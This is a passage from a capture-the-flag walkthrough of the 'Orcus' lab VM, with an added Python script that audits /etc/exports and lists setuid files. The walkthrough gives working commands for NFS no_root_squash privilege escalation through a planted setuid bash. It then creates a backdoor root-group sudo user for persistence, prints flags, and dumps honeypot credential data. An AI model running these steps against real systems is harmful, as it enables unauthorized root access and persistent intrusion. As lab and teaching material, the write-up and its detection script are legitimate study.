Oh yes, no_root_squash. By default an NFS server maps a client's uid 0 to nobody (root squashing); with no_root_squash, root on my Kali box stays root on the export, so any file I write there is owned by root, setuid bit included. Combined with rw and a client spec of * (any host may mount), that is a straight privilege escalation: plant a setuid-root binary in /tmp and run it as www-data.
First, on Kali you need to install nfs-common (wtf Kali). Then confirm the export:
root@kali:~# showmount -e 192.168.1.21
Export list for 192.168.1.21:
/tmp *
As expected
mkdir -p /tmpvictim
mount -t nfs 192.168.1.22:/tmp /tmpvictim -o nolock
On the VM, copy a shell into the export:
cp /bin/bash /tmp/bash
From Kali, where the copy is now owned by root, make a setuid copy of it (4755 would do; the important bit is the leading 4):
cp /tmpvictim/bash /tmpvictim/vulnbash
chmod 4777 /tmpvictim/vulnbash
Back on the VM, run it with -p; without that flag bash notices the effective uid differs from the real uid and drops it straight back to www-data:
/tmp/vulnbash -p
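As an added example (my code, not LinEnum's or the write-up's), here are the two checks behind that escalation, written so they can be run against any box: an exports(5) parser that grades each client clause, flagging exactly the no_root_squash + rw + wildcard combination found above, and a setuid-file walker that would show the planted /tmp/vulnbash owned by uid 0. The sample /etc/exports text is constructed from the file shown above; the severity labels are my choice.

```python
"""Added example: grade /etc/exports entries and list setuid files.
The sample exports text is constructed; severities are my own scheme."""
import os
import stat
from typing import Dict, List, Tuple

OPTION_RISK = {
    "no_root_squash": "client root is root on the export: setuid-root files can be planted",
    "rw": "export is writable",
    "insecure": "mounts from unprivileged source ports accepted (any user on a client, not only root)",
}


def parse_exports(text: str) -> List[Tuple[str, str, List[str]]]:
    """Return (path, client, options) per client clause. A path with no
    client clause is exported to everyone with the default options."""
    entries: List[Tuple[str, str, List[str]]] = []
    for raw in text.replace("\\\n", " ").splitlines():  # join continuation lines
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *clauses = line.split()
        if not clauses:
            entries.append((path, "*", []))
        for clause in clauses:
            client, _, opts = clause.partition("(")
            options = [o.strip() for o in opts.rstrip(")").split(",") if o.strip()]
            entries.append((path, client or "*", options))
    return entries


def audit_exports(text: str) -> List[Dict[str, object]]:
    """One finding per client clause, worst case first in the severity scale:
    critical = writable by any host with client root kept as root."""
    findings: List[Dict[str, object]] = []
    for path, client, options in parse_exports(text):
        issues = [OPTION_RISK[o] for o in options if o in OPTION_RISK]
        if client == "*" or "*" in client or "?" in client:
            issues.append(f"client spec '{client}' allows any host")
        if "no_root_squash" in options and "rw" in options and client == "*":
            severity = "critical"
        elif "no_root_squash" in options:
            severity = "high"
        elif issues:
            severity = "medium"
        else:
            severity = "info"
        findings.append({"export": path, "client": client, "severity": severity, "issues": issues})
    return findings


def find_setuid(root: str) -> List[Tuple[str, int]]:
    """Walk `root` without following symlinks; return (path, owner uid) for
    every regular file carrying the setuid bit. uid 0 is the interesting case."""
    hits: List[Tuple[str, int]] = []
    for dirpath, _dirs, filenames in os.walk(root):
        for fn in filenames:
            p = os.path.join(dirpath, fn)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append((p, st.st_uid))
    return hits


# Constructed sample: the commented examples from the file above plus its live line.
SAMPLE_EXPORTS = """\
# /etc/exports: the access control list for filesystems which may be exported
/srv/homes   hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
/srv/nfs4    gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
/tmp *(rw,no_root_squash)
"""

if __name__ == "__main__":
    for f in audit_exports(SAMPLE_EXPORTS):
        print(f"[{f['severity']}] {f['export']} -> {f['client']}: {'; '.join(f['issues']) or 'ok'}")
    for path, uid in find_setuid("/tmp"):
        print(f"setuid file {path} owned by uid {uid}{' (root!)' if uid == 0 else ''}")
```

On the target, `find_setuid("/")` run after the mount trick is the defender's view of the same event: a setuid file owned by root sitting in a world-writable directory is the thing to alert on, and exporting /tmp with no_root_squash is the thing to fix.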
Yes sir, we got root. To make it more stable I'll create a user and log in over SSH. (openssl's -crypt is the old 13-character DES crypt; it is fine for a lab box, but on anything recent use openssl passwd -6 for a SHA-512 hash instead.)
openssl passwd -crypt test
SSybfm7a0XqFo
useradd -p SSybfm7a0XqFo -s /bin/bash -g 0 groot
usermod -aG sudo groot
root@kali:/tmpvictim# ssh groot@192.168.1.22
groot@Orcus:/$ id
uid=1007(groot) gid=0(root) groups=0(root),27(sudo)
groot@Orcus:/$ sudo su
sudo: unable to resolve host Orcus
root@Orcus:/# id
uid=0(root) gid=0(root) groups=0(root)
Second flag:
root@Orcus:~# cat flag.txt
807307b49314f822985d0410de7d8bfe
Then I found what makes this VM unique. After some searching on the user kippo I found earlier: it is the account used by the Kippo SSH honeypot. Neither of the last two machines had a honeypot! So I went looking for a flag there.
Third flag, found by poking around in the honeypot's config:
root@Orcus:/etc/kippo# cd data
root@Orcus:/etc/kippo/data# ls
userdb.txt
root@Orcus:/etc/kippo/data# cat userdb.txt
root:0:123456
fakuser:1:TH!SP4SSW0RDIS4Fl4G!
AND it's done!
M.